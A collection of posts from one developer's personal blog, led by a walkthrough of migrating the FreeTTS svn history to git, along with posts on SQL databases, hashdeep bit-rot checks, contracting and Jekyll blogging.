speech synth in the [communication
book](http://communication-book.wikispaces.com/) program I've been working on,
and have tripped over a bug in freetts running under openJdk. The freetts
source code lives in a svn repository on sourceforge. The first step in
troubleshooting is to build the library from source. In order to track any
local experimentation / fixes I need to have some kind of local source control,
and svn sucks too much to provide this. The obvious next step is to pull the
sources down with git-svn (or svn2git as github recommends).
After a couple of aborted attempts I was reminded how the loosely defined
structure of a svn repository and the over-generalization of tags & branches
allows for a complete mess, which then is a pain to import cleanly.
> "And they want to make snapshots of smaller subdirectories of the filesystem.
> After all, it's not so easy to remember that release 1.0 of a piece of
> software is a particular subdirectory of revision 4822."
>
> ~ [http://svnbook.red-bean.com/en/1.7/svn.branchmerge.tags.html](http://svnbook.red-bean.com/en/1.7/svn.branchmerge.tags.html)
**Argh!** Terrible "feature", if you're using this feature then _you're doing
source control wrong_!
I could just grab a tarball and start from there, however there is new code
upstream since their last release (v1.2.2), and that means testing two
branches, and possibly investigating diffs. In addition if I'm going to make
the effort to import the history, I ought to do it well enough first time that
others can build on it. It's much harder to correct a bad scm import once work
is continued, especially in the distributed world of open source.
And so, for my sins, I set about importing the history, and hacking away at it
with the excellent tools git provides to turn it into something that actually
linked together correctly and didn't make me feel ill by including CVSROOT all
over the place (yes, it's not the first migration this project's been through).
On the plus side, it is fantastic that the open source license gives a user of
a library such as myself the right to go ahead and do something like this and
to share the improvement with the world, regardless of whether it's something
the original creators / maintainers would have done.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/8160450028/"><img
src="https://live.staticflickr.com/7271/8160450028_af1097a2f7.jpg"
alt="Photo of lake, trees and ducks at sunset"></a>
</div>
The layout of the FreeTTS svn repo is not consistent in directory structure,
which means the svn import tools don't behave quite as one might expect. This
is the inevitable downside to subversions poor choice of architecture around
"everything's just a directory structure". (Bitter? Me? Never!)

This is the inevitable downside to subversion's poor choice of architecture.
Here's a taster of how inconsistent the layout is and what a challenge is ahead
tidying it up:
```
tim@atom:~/repo/freetts.svn$ ls */*
branches/release:
FreeTTS
tags/freetts:
FreeTTS
tags/pre-rel1-1:
FreeTTS
tags/rel_1_0_5:
CVSROOT FreeTTS
tags/rel1_1_0:
FreeTTS
tags/rel1_1_2:
FreeTTS
tags/rel1_2_0:
CVSROOT FreeTTS
tags/rel1_2_1:
FreeTTS
tags/rel1_2_2:
acknowledgments.txt build.xml demo.xml index.html license.terms overview.html RELEASE_NOTES speech.properties tests
ANNOUNCE.txt demo docs lib mbrola README.txt rtp src tools
tags/rel_1_2_beta:
FreeTTS
tags/rel1_2beta2:
CVSROOT FreeTTS
tags/start:
FreeTTS
tags/sun:
FreeTTS
trunk/CVSROOT:
checkoutlist commitinfo config cvsignore cvswrappers editinfo loginfo modules notify rcsinfo syncmail taginfo verifymsg
trunk/FreeTTS:
acknowledgments.txt build.xml demo.xml index.html license.terms overview.html RELEASE_NOTES speech.properties tools
ANNOUNCE.txt demo docs lib mbrola README.txt rtp src unittests</span>
```
It took all my git-fu powers to sort out this mess. Below is a time shortened
sequence of how it was done, just in case I have the misfortune to need to do
it again. I ended up abandoning all the ancient tags as they were going to be
more effort than I liked to fix, and they could be added retrospectively if
anyone really cared. It took me many attempts to get to the below, and this is
what I've reconstructed from my fragmented history, hopefully it will provide
enough clues should you wish to do similar.
FreeTTS project urls:
* Project front page [http://freetts.sourceforge.net/](http://freetts.sourceforge.net/)
* project site [http://sourceforge.net/projects/freetts/](http://sourceforge.net/projects/freetts/)
* repo browser [http://freetts.svn.sourceforge.net/viewvc/freetts/](http://freetts.svn.sourceforge.net/viewvc/freetts/)
* svn http access [https://freetts.svn.sourceforge.net/svnroot/freetts/](https://freetts.svn.sourceforge.net/svnroot/freetts/)
At time of writing the current svn revision is 582.
The latest packaged version for ubuntu:
```
apt-cache show freetts
Package: freetts
Priority: optional
Section: universe/java
Installed-Size: 13532
Maintainer: Ubuntu Developers <[<EMAIL>>](http://www.blogger.com/<EMAIL>%3E)Original-Maintainer: <NAME> <[<EMAIL>>](http://www.blogger.com/<EMAIL>%3E)Architecture: all
Version: 1.2.2-3
Depends: default-jre | java2-runtime
Filename: pool/universe/f/freetts/freetts_1.2.2-3_all.deb
Size: 9456904
MD5sum: 183bed09b1b8e2d8642f46b7538273f4
SHA1: 8df47df82124704b890f446a1bc958d33fd273d3
SHA256: 8920440eaa58c087cb268e8e2a64d44ac873fb44d49b34f180f587f9c69421a7
Description-en: speech synthesis system
FreeTTS is a speech synthesis system written entirely in the Java(TM)
programming language. It is based upon Flite, a small run-time speech
synthesis engine developed at Carnegie Mellon University. Flite in turn
is derived from the Festival Speech Synthesis System from the University
of Edinburgh and the FestVox project from Carnegie Mellon University.
Homepage: http://freetts.sourceforge.net
Description-md5: a346fe6dcc2c0164ec6b7c3891945e56
Bugs: https://bugs.launchpad.net/ubuntu/+filebug
Origin: Ubuntu
```
So here's the import more or less as it happened:
```
mkdir freetts.svn.git; cd freetts.svn.git
svn2git --verbose https://freetts.svn.sourceforge.net/svnroot/freetts/
git gc
```
```
cat .git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[svn-remote "svn"]
noMetadata = 1
url = https://freetts.svn.sourceforge.net/svnroot/freetts
fetch = trunk:refs/remotes/svn/trunk
branches = branches/*:refs/remotes/svn/*
tags = tags/*:refs/remotes/svn/tags/*
[branch "release"]
remote = .
merge = refs/remotes/svn/release
```
get a copy without the svn references (which stop us seeing whether the rewritten history is free of old cruft)
```
cd ..
git clone freetts.svn.git/ freetts.git
cd freetts.git/
gitk --all &
# The following is done while keeping an eye on and refreshing (ctrl+f5) gitk to see the effects:
# Filter out the cvs rubbish so that git can match up commits that do have it with commits that don't
git filter-branch --tree-filter 'rm -rf CVSROOT' --prune-empty -- --all
# Remove the unnecessary top level folder (which inconsistently existed)
git filter-branch --prune-empty --subdirectory-filter FreeTTS/ -- --all
# Remove the backup refs filter-branch creates
rm -rf .git/refs/original/
```
delete all the crappy svn "tags", just tag the latest
```
git tag -d `git tag`
Deleted tag 'freetts' (was 8d953b7)
Deleted tag 'pre-rel1-1' (was d1c597f)
Deleted tag 'rel1_1_0' (was 625abdd)
Deleted tag 'rel1_1_2' (was b51fb71)
Deleted tag 'rel1_2_0' (was 7a4fc18)
Deleted tag 'rel1_2_1' (was a126a4a)
Deleted tag 'rel1_2_2' (was b3a0dcf)
Deleted tag 'rel1_2_2@557' (was bf94dbe)
Deleted tag 'rel1_2beta2' (was c0d90e9)
Deleted tag 'rel_1_0_5' (was e95aff8)
Deleted tag 'rel_1_2_beta' (was 1723b2d)
Deleted tag 'start' (was c020efe)
Deleted tag 'sun' (was cfadbc8)
```
correct commit found manually:
```
git tag v1.2.2 ae49425
```
and finally, push to github
```
git remote add origin .... (my repo details)
git push --mirror
```
You can find my repo at [https://github.com/timabell/FreeTTS](https://github.com/timabell/FreeTTS)
and the intermediate copy here: [https://github.com/timabell/FreeTTS-svn-mirror](https://github.com/timabell/FreeTTS-svn-mirror)
_All done_
`^_^`
Here's the reason I didn't bother with tags in the end: I couldn't rewrite the
tags as they had no author:
```
git filter-branch --tree-filter 'rm -rf CVSROOT' --prune-empty --tag-name-filter cat -- --tags
Cannot create a new backup.
A previous backup already exists in refs/original/
Force overwriting the backup with -f
tim@atom:~/repo/freetts.git$ rm -rf .git/refs/original/
tim@atom:~/repo/freetts.git$ git filter-branch --tree-filter 'rm -rf CVSROOT' --prune-empty --tag-name-filter cat -- --tags
Rewrite 8611e271692fc33e6160a2a217b9b3060dfbcd1d (1044/1044)
Ref 'refs/tags/freetts' was rewritten
WARNING: Ref 'refs/tags/pre-rel1-1' is unchanged
WARNING: Ref 'refs/tags/rel1_1_0' is unchanged
Ref 'refs/tags/rel1_1_2' was rewritten
Ref 'refs/tags/rel1_2_0' was rewritten
Ref 'refs/tags/rel1_2_1' was rewritten
Ref 'refs/tags/rel1_2_2' was rewritten
Ref 'refs/tags/rel1_2_2@557' was rewritten
Ref 'refs/tags/rel1_2beta2' was rewritten
Ref 'refs/tags/rel_1_0_5' was rewritten
Ref 'refs/tags/rel_1_2_beta' was rewritten
Ref 'refs/tags/start' was rewritten
Ref 'refs/tags/sun' was rewritten
freetts -> freetts (b3a4bbf8768ade6275c91ce0e76d933e30b3ddbf -> 48e84e3560e765db3b33479e2e9a76fe2ccf3550)
error: char79: malformed tagger field
fatal: invalid tag signature file
Could not create new tag object for freetts
git show rel_1_2_beta | head
tag rel_1_2_beta
**Tagger: (no author) <(no author)@4<PASSWORD>b-1a4a-0410-81c8-f0a525965860>**Date: Mon Dec 22 14:46:05 2003 +0000
This commit was manufactured by cvs2svn to create tag '\''rel_1_2_beta'\''.
commit 57ed00e981585aad590c9521d7c3a0bccf6284fa
Author: (no author) <(no author)@<PASSWORD>>
Date: Mon Dec 22 14:46:05 2003 +0000
```
------
My advice if you are importing svn for a commercial project: Don't! Just export, and import into your new source control tool. Leave the svn repo read only for a while just in case you need that history, and after a year of never looking back, archive it off.
<file_sep>---
layout: post
title: Developers, Love Your SQL Database
date: 2018-03-12 19:30:15.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
meta:
_wpcom_is_markdown: '1'
_rest_api_published: '1'
_rest_api_client_id: "-1"
_publicize_job_id: '15656264083'
timeline_notification: '1520883016'
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2018/03/12/developers-love-your-sql-database/"
---
Developers, don't be afraid of your SQL database, don't try and ignore it, try and make it the best it can be just like you do for your code.
## What's wrong today
I've noticed that a lot of projects that have SQL databases don't apply the high standards that they have for their codebase (refactoring, clean code, documentation, etc.) to the SQL part of their projects.
Dealing with relational databases is harder than code:
* The tooling that I see teams using to manage their relational databases is crap.
* Having to handle live data makes refactoring harder (but not impossible).
* SQL is a language from the stone-age of software.
But that's no excuse for not doing the best you can for the problem at hand.
## There are answers to these problems
Some of the answer is just accepting that it's harder and learning to be effective. For example I find [VsVim](https://marketplace.visualstudio.com/items?itemName=JaredParMSFT.VsVim) and [SQL Prompt](https://www.red-gate.com/products/sql-development/sql-prompt/) to be great for editing SQL.
[Redgate](https://www.red-gate.com/) have a great suite of tools for managing the full lifecycle of a database. Use them. I particularly like the way [ReadyRoll](https://www.red-gate.com/products/sql-development/readyroll/) handles migrations. RedGate tooling has excellent [integrations with Octopus deploy](https://octopus.com/blog/database-deployments-with-octopus-and-redgate-sql-release).
So if you're in the situation I've seen with a database you virtually can't change and nothing but a visual studio database project in place that may or may not be in place with production, then try the following:
1. Throw away the database project.
2. Set up ReadyRoll in your visual studio project.
3. Grab your production schema, and use that as a base in your ReadyRoll migrations. (It has a neat feature for a first "migration" that will only be run on a new database build, so it can build you a dev database from scratch, but it won't attempt to recreate production).
4. Configure ready-roll to use branch folders.
5. Start creating migrations in feature branches.
6. Set up CI / test / QA / pre-prod environments (or whatever you call them in your team) to drop and rebuild the database with every build. You can make this faster by using SQL Server snapshots.
7. Each environment then runs the database migrations that match the version of the codebase that was released to that environment.
8. Push changes up through the environments until those migration scripts have been run so many times you are no longer afraid to run them.
Now you can refactor your database with confidence just like you can with the code, and it can stop being something you pretend isn't there and start being something you are proud to show off.
There are many potential complications, such as re-indexing tables with lots of data in production, but these are not things that an intelligent well-functioning DevOps team can't handle well once the basic process is in place.
## Further Reading
* [https://gist.github.com/timabell/6fbd85431925b5724d2f](https://gist.github.com/timabell/6fbd85431925b5724d2f) - source control your schema documentation (ms_description attributes)
* [https://dba.stackexchange.com/questions/515/how-do-you-document-your-databases](https://dba.stackexchange.com/q/515/33693)
* * *
If you like this, you might appreciate the tool I'm working on to shed further light on the dark corners of your SQL database, check it out at [http://schemaexplorer.io/](http://schemaexplorer.io/?utm_source=blog.timwise&utm_medium=web&utm_campaign=love-db) and be sure to sign up to the waiting list.
<file_sep>---
title: "eBay / iRiver"
date: 2005-06-23
slashdot_url: https://slashdot.org/journal/110112/ebay--iriver
---
<p>Gosh I really was annoyed on sunday!</p>
<p>Having said all that, buy my stuff on eBay (again)!<br>I'll figure out an alternative another day, but it's gonna be tricky when eBay have market share and a fat advertising budget.<br>Never trust a company with a large advertising budget, they tend to discover advertising budget has a better ROI than investing in the product, motivating staff, providing customer support etc etc.</p>
<p>In other news, the new iRiver H10 looks nice but appears to be missing all of the advantages of the older H300. Damn. Thought it was about to kick iPod's shiny backside.</p>
<p><a href="http://search.ebay.co.uk/_W0QQfgtpZ1QQfrppZ25QQsassZtimQ5fabell">http://search.ebay.co.uk/_W0QQfgtpZ1QQfrppZ25QQsassZtimQ5fabell</a><br><a href="http://www.iriver.com/">http://www.iriver.com/</a></p>
<file_sep>---
title: "Swimming"
date: 2004-01-15
slashdot_url: https://slashdot.org/journal/58405/swimming
---
<p>20 lengths today. In 45 mins. Did quite a lot in front crawl today so am quite pleased, then I used one of those float things so I could just use my legs. Apparently my kicking for front crawl adds nothing to my forwards movement but still wears me out, that might explain why I have such difficulty with front crawl. Think I'll need to work on that one. My legs seem quite good at breast stroke style swimming as I can quite easily do a length that way. I did do a couple of really fast lengths (by my standards), one in front crawl, the other in breast stroke. Oh, and just because I like being a bit sad sometimes, I counted some of the lengths in binary.<nobr> </nobr>:D</p>
<file_sep>---
layout: page
title: Payment cancelled, oh no!
---
I'm afraid I have no idea what happened, but if you have any problems get in touch <<EMAIL>>
<file_sep>---
title: "So what _is_ the \"internet\"?"
date: 2004-08-22
slashdot_url: https://slashdot.org/journal/81179/so-what-is-the-internet
---
<p>Maybe it's a <a href="http://www.bsd-unix.net/seitz/funny/RvB_NYC2.mov">movie</a>? [edit: link busted.<nobr> </nobr>:( ]<br>Thank you <a href="http://b3ta.com/newsletter/issue148/">b3ta</a></p>
<file_sep>---
title: "Another rung on the ladder"
date: 2004-07-05
slashdot_url: https://slashdot.org/journal/76532/another-rung-on-the-ladder
---
<p>Today I passed microsoft exam <a href="http://www.microsoft.com/learning/exams/70-270.asp">70-270</a>.</p>
<p>So you can call me<br><NAME> BSc MCP<br>Woo!</p>
<file_sep>---
title: "life update"
date: 2004-09-01
slashdot_url: https://slashdot.org/journal/82368/life-update
---
<p>it's late so I'll keep it short.<br>I went to greenbelt this weekend, which was fun. Good music, great music, some terrible music. A bearable dose of religion, and quite a nice element of generic spirituality. Plenty of rain outside the tent but I didn't get very wet except when I flew my kite.</p>
<p>Dropped in to london town last night to see some old friends and had a great evening. Don't think there's anything I can relay here though!</p>
<p>urgh. bed.</p>
<p>did I mention I'm now running an apache webserver on Mandrake Linux? I did? Oh well, never mind then.</p>
<file_sep>---
layout: post
title: Configuration confusion in visual studio
date: '2012-07-10T14:43:00.001Z'
author: <NAME>
categories: [gotcha, visual studio]
modified_time: '2012-07-10T14:43:30.568Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6546456780454569539
blogger_orig_url: https://timwise.blogspot.com/2012/07/configuration-confusion-in-visual.html
---
Here's a gotcha that got me.
It is not immediately obvious, but visual studio stores in its sln file a set
of project configuration selections for every combination of solution
configuration and solution platform.

The gotcha is that by default Visual Studio (all versions 2008-2012 as far as I
know) only show one half of that combination in the standard toolbar, so you
can get in a situation where one of your developers is building something
completely different to everyone else as somehow the platform has silently been
changed.
I recommend you add Platform to your toolbar so that you can _always_ see what
you are about to build.


And if possible, remove any unused platform configurations from your solution
entirely.
<file_sep>---
title: "File manager of fun"
date: 2004-04-05
slashdot_url: https://slashdot.org/journal/67358/file-manager-of-fun
---
<p><a href="http://www.forchheimer.se/bfm/">1st Person</a> file management.<br>Didn't bother trying it, it's still funny even if it isn't true.<br>(<a href="http://slashdot.org/article.pl?sid=04/04/04/1621251">Slashdotted</a>)</p>
<file_sep>---
title: Detecting bit-rot with md5deep
layout: post
---
Thanks to [luxagen](http://luxagen.com/) for getting me to actually set something up for this. Turned out to be mighty useful when I accidentally trashed half my home folder and wanted to know if [syncthing](https://syncthing.net/) had propagated any of the damage.
The use case is slightly different to mine, but [RotKraken](https://github.com/luxagen/RotKraken) is worth a look. Its unique feature is storing file hashes in the extended attributes of the same file. This is very tidy but doesn't help me with catching unwanted deletions, hence going back to md5deep.
You'd think that running [md5deep aka hashdeep](https://github.com/jessek/hashdeep) wouldn't be worthy of a blog post, but what I found is that the primary use case for hashdeep is actually validating the integrity of an installation in order to detect rootkits etc. This is not the same as what I'm doing which is being able to spot if I've lost any files I care about in `/home/tim` through carelessness or [bit-rot](https://en.wikipedia.org/wiki/Data_degradation). It turns out that md5deep does actually have what I needed, but the way the options are described means it's not at all obvious that it would fulfill this need.
You can find [my hash and verify scripts as a gist here](https://gist.github.com/timabell/f70f34f8933b2abaf42789f8afdbd7d5)
It turns out the magic is in the "audit" section of the docs.
The terminology of the verification output is more about what it did than why you care. The important one for spotting bit-rot when verifying is `Known file not used` which means that you have a hash but you no longer have a matching file anywhere. Either you deleted it or modified it on purpose or you've just lost something you care about. Time to reach for the backups. I like [back-in-time](https://backintime.readthedocs.io/) to usb disks for backup.
## Hashing
```
hashdeep -c md5 -of -r -l Music Documents > hash_file.txt
```
<https://explainshell.com/explain?cmd=hashdeep+-c+md5+-of+-r+-l+Music+Documents>
Output:
```
%%%% HASHDEEP-1.0
%%%% size,md5,filename
## Invoked from: /home/tim
## $ hashdeep -c md5 -of -r -l Music Downloads Documents Pictures Phone Dropbox repo
##
3425,3ecc5852703f3846298b381bc2510a39,Music/checksums-verification-Music.txt
461,456e92277eaf9de695bd1229d80f059b,Music/checksums-verification-Music.txt.bak
100663,0d9d53e95e5d80fa43a64f5d02f25b1e,Music/checksums-Music.txt
794926,95c1558e7c97200140c37ffb0d12669d,Music/flac/Mordecai Smyth - Dial M For Mordecai/cover.jpg
17618302,cfb11490aacfdcbb79fd4310cf834e01,Music/flac/Mordecai Smyth - Dial M For Mordecai/Mordecai Smyth - Dial M For Mordecai - 02 Psychedelic Sarah.flac
...
```
## Verifying
```
hashdeep -k hash_file.txt -rle -of Music Documents -avv
```
<https://explainshell.com/explain?cmd=hashdeep+-k++hash_file.txt+-rle+-of+Music+Documents+-avv>
Output:
```
Documents/hashdeep-checksums-verification.txt.bak: Moved from Documents/hashdeep-checksums-verification.txt
Documents/hashdeep-checksums-verification.txt: No match
Documents/hashdeep-checksums.txt: No match
repo/rust-kata/.idea/workspace.xml: No match
repo/rust-kata/.git/logs/HEAD: No match
...
Documents/hashdeep-checksums-verification.txt.bak: Known file not used
Documents/hashdeep-checksums.txt: Known file not used
repo/rust-kata/.idea/workspace.xml: Known file not used
...
```
## Workflow
I have a monthly calendar reminder to run backups. When that goes off I:
1. Run `verify-hashes.sh` and search the output for "Known file not used" to find any rot or churn.
1. Run `rehash.sh` to update the hashes.
1. Plug a backup HDD in and run back-in-time to update the backup
1. Sleep easy.
I run one hash file for all folders. I started with one per top level folder but that meant the verify couldn't spot things moved between folders and it reported them as missing.
It would be nice to iterate on this but it's a good start.
<file_sep>---
layout: page
title: Hire Me
permalink: /hire/
redirect_from:
- /hire-me/
---
## About Charm Consulting Ltd
Charm Consulting provides ASP.NET software engineering and consulting services
on a contract basis.
## About Me (<NAME>)
I provide programming and consultancy services for clients with primarily C# /
ASP.NET MVC projects. I focus on providing quality long-term solutions to the
problems at hand, making sure the work being done is aligned with the
priorities and values of the client. I have full-stack web development
capabilities, with an emphasis on back-end systems. I can lead, mentor and can
communicate with all stakeholders.
My core values in my work are: honesty, continual learning, applying best
practices, quality, elegance, practicality, avoiding dogmatism, emergent
architecture, YAGNI, agility, customer focus, continuous process & code
improvement.
[Read more about my approach to work](/2018/03/10/my-approach-to-my-work/).
I’ve focussed on software engineering roles & projects since graduating in 2000
with a degree in Cybernetics & Control Engineering from Reading University.
I’ve had the opportunity to work in organisations of all sizes which has allowed
me to gain broad knowledge and skills, from team leadership to server
administration.
As the tech industry never stands still I've recently been broadening my
skillset by adding GoLang to my existing full-stack C# / ASP.NET web
development skills. My latest side-project (written in GoLang) is
[SQL Schema Explorer](https://timabell.github.io/schema-explorer/), this has been helping me improve my marketing skills
as well as broadening my programming skills.
[](https://app.pluralsight.com/profile/timabell)
I have a broad interest in programming and business and am always doing
something beyond client work.
---
* For current availability, more information and updates <a href="https://www.linkedin.com/in/timabell/">find me on LinkedIn</a>.
* <<EMAIL>> - drop me a line to arrange a call.
* [Get notified when I’m available for contracts](http://eepurl.com/c82ZpL) - low volume mailing list.
* CV available on request
---
[](https://www.flickr.com/photos/tim_abell/26154585057/)
---
To learn about my approach to protecting against duplicate recruiter submissions see my <a href="/recruiters/">recruiters</a> page.
<file_sep>---
title: "Hulloa"
date: 2004-02-05
slashdot_url: https://slashdot.org/journal/60927/hulloa
---
<p>Gosh, it's 7 days since i wrote here.<br>I'm back to my nocturnal ways - such is the way of the geek.</p>
<p>I've joined our friendly local <a href="http://www.thamesvalleytri.f9.co.uk/">triathletes</a>, who have been teaching me to "swim", I can nearly front crawl now. This is why I've given up logging my distances for the moment, I need to get the technique sussed before I worry too much about the fitness. Having said that I believe I managed 20+ lengths (25m) on wed eve in the hour's training, mostly in front crawl which was an achievement for me. (Bear in mind I only started swimming in Nov '03.)</p>
<p>right, back to attempt 4 at suse linux</p>
<p>Tim</p>
<p>ps:<br>Coz beat me in oz:<br>42 lengths of 51.5 meters in 1.5 hours</p>
<file_sep>---
title: What you should do between contracts
layout: post
redirect_from:
- /2020/04/06/what-should-you-do-between-contracts/
---
# Strange times with Covid-19
I can't post this without mentioning the context I'm writing in of the
coronavirus pandemic lock-down.
I consider myself extremely lucky to be in the line of work I am that allows me
the flexibility to continue working remotely whilst still protecting myself and
those around me by avoiding contact.
## What I normally do
In calmer times I'd have taken the opportunity to spend at least a couple of
weeks with family (have small people and time with them is preciously
fleeting). Then get my life in order, then go hell for leather getting into the
next thing I can help build.
Some of my fellow contractors like to make sure they have the next contract
lined up ready for the finish date of their current contract. While this is
optimal for revenue I don't do this because:
* I find it is a full time job generating, tracking and dealing with
contracting leads
* I wouldn't want to be distracted from the current client's work to the next
thing
* I wouldn't want to half-arse the contract hunt and not get the optimal
contract for myself and the next client.
* There is a tendency for last-minute contract extensions to appear which would
mean letting down one or other client.
So after a contract is completely finished, and some time with family, only
then do I take the contract hunt seriously.
## What I'm doing this time
Given the uncertainty caused by COVID-19 + IR35 (by the way COVID is short for
Corona Virus Disease) and the fact I just moved house (i.e. less cash reserves
than usual) I can't take it too easy this time. Even though the IR35 changes
have been delayed a year a lot of the damage has been done so the contractor
market is challenging at the moment.
I finished my contract with DfE on a Tuesday, allowed myself till the following
Monday for uninterrupted family time. (Okay almost uninterrupted, I can't
really put technology down for that long and I also have my charitable work for
[DogLost](https://doglost.co.uk) that takes up some time.)
Now that is over, I'm doing roughly 9am-1pm on the business related tasks
suggested below.
# What should you do to make the most of finishing a contract?
## Step 1. Take a break
Contracting is in my experience much more intense than permanent employment.
This is in fact how I like it. But in order to be able to give your all to the
next contract I think it is important to give yourself the space to recharge.
When in a contract it's easy to end up with tunnel vision, especially for one
as long as my last one (2 years!), where all you can think about is how it was
done there and how you reacted to the influences around you during that time.
One of the strengths you can bring to a contract as a contractor is the broader
perspective from seeing many organisations, approaches, technologies and
people. It requires a bit of down-time for your latest experience to sink in
once you are out of the hustle and bustle of delivery, and for it to be merged
into your bank of knowledge.
What better way to end a contract than with good chunk of time with family and
friends while your subconscious churns through and processes everything that's
happened over the last contract.
I believe if you dive headlong into the next thing with nothing more than a
normal weekend off then your brain will not have the opportunity to properly
process what you've learnt before being overwhelmed with an influx of new
information from a new client.
## Step 2. Update your online presence and CV
You've probably learned a lot and changed a bit since you started the last
contract.
Review and update all your profiles:
* LinkedIn
* Twitter (make a new pinned tweet!)
* GitHub
* StackOverflow
* etc.
Think about what your next client will be interested in and what they want help
with and make sure your profiles provide evidence that you have done similar
things before and can get results.
## Step 3. Do some writing
The best way to shape your thoughts on the whole thing is to put them into
writing. So spend some time blogging like I'm doing now, and make sure to
cross-post your articles to the places where your customers will see them. You
should own your own content, keep it on your own domain on your own blog where
no platform can take away your audience, then cross-post to places like
[dev.to](https://dev.to), LinkedIn and Medium (if that's your thing) with links
back to your own domain. Better still on your posts ask people to sign up to
your mailing list and email them when you post new articles etc.
## Step 4. Catch up with old acquaintances
It's hard when you're flat out with life and contracts to keep in touch with
everyone. Reach out to old business and personal friends. You never know it
might kick off your next opportunity, or help you learn something about
yourself that's useful.
## Step 5. Go all guns blazing on getting the next piece of work
> "You will get all you want in life if you help enough other people get what they want,"
> ~ <NAME>
Figure out who'd value your skills most even in these difficult times and have
at it.
You might find my previous article ["How to find contract developer
jobs"](https://timwise.co.uk/2019/06/26/how-to-find-contract-dev-jobs/) useful
at this point.
Personally I'm looking to also increase the value I provide beyond
implementation work. This might take the form of team lead roles, or some
digital transformation consultancy.
# ~ End ~
What do you do between contracts or how do you avoid having gaps? Are you
between contracts now thanks to IR35?
<file_sep>---
title: "Curiosity did _not_ kill the cat. That was the car >:|"
date: 2004-09-20
slashdot_url: https://slashdot.org/journal/84305/curiosity-did-not-kill-the-cat-that-was-the-car-
---
<p>This is <a href="http://slashdot.org/~mcrbids">mcrbids</a>' sig, and I want to show this to all my friends who have ever said "I'm just curious about stuff".</p>
<blockquote><div><p> <i>I have no special talents. I am only passionately curious.</i><br>--<NAME></p></div></blockquote>
<p>I knew there was nothing magic about knowledge and talent, it's all about dedication, and there's no better motivation than curiosity.</p>
<file_sep>---
layout: post
title: Setting up a static website/blog with jekyll
categories: [howto,backstage]
---
A couple of people asked me for more info on my new blog setup here's a rough
outline of what's involved in setup and posting. There are *many* ways of doing
this, this is just the way that suited me best for now.
What you need to follow along:
* A domain from [GoDaddy](https://uk.godaddy.com/)
* An account on [GitHub](https://github.com/)
# Things I like about this setup
* Built-in backups,
* offline editing,
* no shonkey web gui,
* no charge for hosting with custom domain and https,
* simple dev friendly templating,
* a nice simple code-friendly mobile-friendly design,
* full control.
* [public revision
history](https://github.com/timabell/timwise.co.uk/commits/master) of blog
posts with no extra effort (no more "updated: blah" in blog posts)
# Why jeykll fits that
A blog post like this one is just a text file in a special format called
markdown. These can then be trivially source-controlled with git, which serves
as version control and distributed backup in one neat package. I use git for
work so although it's not the easiest tool to use that's not a problem for me.
Theoretically if you don't know git you could probably just do all your editing
in the github web interface these days.
Here's the *entire* folder structure of this blog as it stands right now. You
can see there's really not a lot to it.
```
tim@fox:~/repo/timwise.co.uk(master)
$ tree
.
├── 404.md
├── about.md
├── categories.md
├── CNAME
├── _config.yml
├── _drafts
│ └── 2019-06-24-setting-up-a-jekyll-blog.md
├── favicon.ico
├── fonts
│ ├── aramisi.ttf
│ ├── EBGaramond-Regular.ttf
│ └── FuturaPTLight.otf
├── images
│ ├── 404.jpg
│ ├── reverie-demo.png
│ ├── reverie.png
│ └── reverie-text.png
├── _includes
│ ├── analytics.html
│ ├── disqus.html
│ ├── meta.html
│ └── svg-icons.html
├── index.html
├── _layouts
│ ├── default.html
│ ├── page.html
│ └── post.html
├── LICENSE
├── _posts
│ └── 2019-06-21-yet-another-new-blog.md
├── _sass
│ ├── _darcula.scss
│ ├── _highlights.scss
│ ├── _reset.scss
│ ├── _svg-icons.scss
│ └── _variables.scss
└── style.scss
7 directories, 30 files
```
The posts are just text files using the markdown format with a `.md` file extension instead of `.txt` and a short header for information like page title and tags. Here's the top of this one:
```
---
layout: post
title: Setting up a static website/blog with jekyll
categories: [howto,backstage]
---
A couple of people asked me for more info on my new blog setup here's a rough
outline of what's involved in setup and posting. There are *many* ways of doing
this, this is just the way that suited me best for now.
```
# How I set it up
I actually am reconfiguring from another setup, and used some advanced
sillyness, but I'll simplify that here down to roughly the steps you'd need to
go from cold as I'm sure that's more interesting to you.
1. Buy a domain from GoDaddy
1. Create a GitHub account
1. [Find a jekyll
theme](https://duckduckgo.com/?q=jekyll+themes&t=lm&ia=web)
to become a base for your new site (the themes vary on how ready they are
for you to just crack on). Here's [the reverie
theme](https://github.com/amitmerchant1990/reverie) that I used with minimal
customisation.
1. Go into the settings for your repo, 
1. turn on github pages, 
1. configure your domain name, 
1. enable https 
1. Go to GoDaddy and [set up the DNS to point to the github
servers](https://help.github.com/en/articles/using-a-custom-domain-with-github-pages)
# Blogging with Jekyll
1. Create new text file in the `_posts` folder, name it
`yyyy-mm-dd-your-post-title.md`,
1. steal the header block from above and customise it for your post,
1. write stuff
1. use markdown for layout,
1. add images by saving them to an images folder and also adding them to your
git repo, use `` to show the image in your `.md` file,
1. check everything in & `git push` to github,
1. your changes are live within seconds of pushing.
If you aren't up to the full `git` setup, you can edit your blog directly in github's web interface.
1. Creating a new post

1. Editing a post

1. Editing the text of a post

# Advanced ninja coder blogging
Part of the reason I chose this particular setup is that plain markdown blogging with github pages allows me to use my existing coder tools to blog things really fast, reducing the barrier to me actually sharing useful insights and thoughts with you all.
You can see the advanced editing flow in action here:
<https://www.youtube.com/watch?v=w3gMZTKcGKc>
<iframe width="560" height="315" src="https://www.youtube.com/embed/w3gMZTKcGKc" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
Here's the tools I use, as shown in the above video:
- [zsh](https://en.wikipedia.org/wiki/Z_shell) - allows changing directory without `cd`
- [symlinks](https://www.howtogeek.com/287014/how-to-create-and-use-symbolic-links-aka-symlinks-on-linux/) to link blog folder into `~/blog`
- [shell script `new`](https://github.com/timabell/timwise.co.uk/blob/1024d49afab27b08ef060ac2d245a37a9d8b3837/new)
- [template md file](https://github.com/timabell/timwise.co.uk/blob/1024d49afab27b08ef060ac2d245a37a9d8b3837/_drafts/template.md?plain=1)
- [jekyll](http://jekyllrb.com/)
- [github pages](https://pages.github.com/)
- [github actions](https://github.com/timabell/timwise.co.uk/actions) - automatically deploys pages (automatically set up when you enable github pages)
